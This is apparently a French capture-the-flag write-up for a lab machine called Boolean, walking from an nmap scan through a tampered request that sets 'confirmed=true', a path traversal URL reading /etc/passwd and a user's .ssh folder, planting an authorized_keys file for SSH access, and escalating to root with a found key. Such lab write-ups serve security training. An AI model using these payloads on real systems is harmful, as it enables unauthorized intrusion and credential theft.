Boolean

burp ssh

• Nom machine : Boolean

• Difficulté : Intermédiaire

• OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 08:30 EDT
Nmap scan report for 192.168.242.231
Host is up (0.032s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA)
|   256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA)
|_  256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519)
80/tcp    open   http
| http-title: Boolean
|_Requested resource was http://192.168.242.231/login
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     HTTP/1.1 400 Bad Request
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Content-Type: text/html; charset=UTF-8
|_    Content-Length: 0
3000/tcp  closed ppp
33017/tcp open   http    Apache httpd 2.4.38 ((Debian))
|_http-title: Development
|_http-server-header: Apache/2.4.38 (Debian)

HTTP (80)

Une page pour se connecter, les identifiants basiques ne fonctionnent pas. Nous pouvons nous enregistrer mais nous devons ensuite faire une confirmation par mail (les box n'ont pas internet).

On peut voir "confirmed:false"

Nous allons modifier la requête :

_method=patch&authenticity_token=77R-DzzEAWx_RfEzT0NWNa0NNvt-S5E8KfcoG1gkbxJx_lv7OyJjLI7Hpx3uzPBapEPAXztXCZsDccmuRXKXdQ&user%5Bemail%5D=test%40test.com&commit=Change%20email&user%5Bconfirmed=true

Bingo !

HTTP (33017)

Une page admin et une page info existe mais nous n'avons pas accès.

Local exploitation

Nous avons tester d'upload un shell mais sans succès. Quand on le recherche via l'url on le télécharge. Nous allons voir s'il est possible de télécharger un fichier de la cible...

http://192.168.242.231/?cwd=../../../../../../etc&file=passwd&download=false

Un utilisateur : remi

http://192.168.242.231/?cwd=../../../../../../home/remi/.ssh&download=false

Dans le direcoire keys, nous trouvons des clefs ssh, mais elles ne fonctionnent ni pour remi ni pour root. Nous allons donc upload notre propre authorized_keys dans le directoire .ssh

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh-keygen
┌──(kali㉿kali)-[~/.ssh]
└─$ cp /home/kali/.ssh/id_rsa.pub authorized_keys

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh remi@192.168.242.231 -i id_rsa
Linux boolean 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 28 09:29:46 2024 from 192.168.45.224
remi@boolean:~$ 

Escalade de privilège

Nous retrouvons notre clefs ssh "root"

remi@boolean:~/.ssh/keys$ ssh root@localhost -i root -o IdentitiesOnly=yes

Nous devons utiliser -o IdentitiesOnly=yes pour n'utiliser que cette clef (les autres sont chargées)